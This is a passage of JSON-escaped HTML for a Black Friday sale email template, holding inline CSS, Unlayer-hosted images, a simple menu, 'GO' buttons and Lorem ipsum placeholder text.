fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) {\\r\\n  .hide-mobile {\\r\\n    max-height: 0px;\\r\\n    overflow: hidden;\\r\\n    display: none !important;\\r\\n  }\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_1 .v-text-align { text-align: center !important; } #u_content_text_2 .v-text-align { text-align: center !important; } #u_content_button_1 .v-text-align { text-align: center !important; } #u_content_menu_1 .v-layout-display { display: block !important; } #u_content_menu_1 .v-padding { padding: 8px 8px 5px !important; } #u_content_text_4 .v-text-align { text-align: center !important; } #u_content_text_5 .v-text-align { text-align: center !important; } #u_content_text_12 .v-text-align { text-align: center !important; } #u_content_text_13 .v-text-align { text-align: center !important; } #u_content_text_14 .v-text-align { text-align: center !important; } #u_content_button_3 .v-text-align { text-align: center !important; } #u_content_text_9 .v-text-align { text-align: center !important; } #u_content_text_10 .v-text-align { text-align: center !important; } #u_content_text_11 .v-text-align { text-align: center !important; } #u_content_button_2 .v-text-align { text-align: center !important; } #u_content_text_24 .v-text-align { text-align: center !important; } #u_content_text_25 .v-text-align { text-align: center !important; } #u_content_text_17 .v-text-align { text-align: center !important; } #u_content_button_4 .v-text-align { text-align: center !important; } #u_content_text_18 .v-text-align { text-align: center !important; } #u_content_text_19 .v-text-align { text-align: center !important; } #u_content_text_20 .v-text-align { text-align: center !important; } #u_content_button_6 .v-text-align { text-align: center !important; } #u_content_button_5 .v-text-align { text-align: center !important; } #u_content_text_15 .v-text-align { text-align: center !important; } #u_content_text_16 .v-text-align { text-align: center !important; } #u_content_button_9 .v-text-align { text-align: center !important; } #u_content_text_27 .v-text-align { text-align: center !important; } #u_content_text_28 .v-text-align { text-align: center !important; } #u_content_button_7 .v-text-align { text-align: center !important; } #u_content_text_35 .v-text-align { text-align: center !important; } #u_content_text_36 .v-text-align { text-align: center !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f5f5f5;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f5f5f5;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #f5f5f5;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603383550682-Screenshot_1.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 251px;\\\" width=\\\"251\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 0px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603384133300-black-friday-mega-sale-social-media-facebook-cover-template_233825-96.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 300px;\\\" width=\\\"300\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_1\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 14px; line-height: 19.6px;\\\">DO NOT RUSH<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 18px; line-height: 25.2px;\\\">CATCH TIME<\\/span><\\/strong><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 18px; line-height: 25.2px;\\\">NOW!<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_1\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:32px; v-text-anchor:middle; width:70px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#db1908\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #db1908; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:8px 25px 8px 24px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">GO<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_menu_1\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"menu\\\" style=\\\"text-align:center\\\">\\r\\n<!--[if (mso)|(IE)]><table role=\\\"presentation\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" align=\\\"center\\\"><tr><![endif]-->\\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n  <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding v-layout-display\\\">\\r\\n    HOME\\r\\n  <\\/span>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n  <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding v-layout-display\\\">\\r\\n    BLACK FRIDAY\\r\\n  <\\/span>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n  <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding v-layout-display\\\">\\r\\n    MAN\\r\\n  <\\/span>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n  <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px\\\" class=\\\"v-padding v-layout-display\\\">\\r\\n    WOMAN\\r\\n  <\\/span>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n<!--[if (mso)|(IE)]><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #111416;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #111416;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"192\\\" style=\\\"width: 192px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-32\\\" style=\\\"max-width: 320px;min-width: 192px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_4\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 24px; line-height: 33.6px; font-family: \'Open Sans\', sans-serif;\\\">WHY DO WE<\\/span><\\/strong><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 24px; line-height: 33.6px; font-family: \'Open Sans\', sans-serif;\\\"> USE IT?<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"408\\\" style=\\\"width: 408px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-68\\\" style=\\\"max-width: 320px;min-width: 408px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_5\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\"><strong><span style=\\\"line-height: 25.2px; font-size: 18px;\\\">BLACK FRIDAY<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #383a3c; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 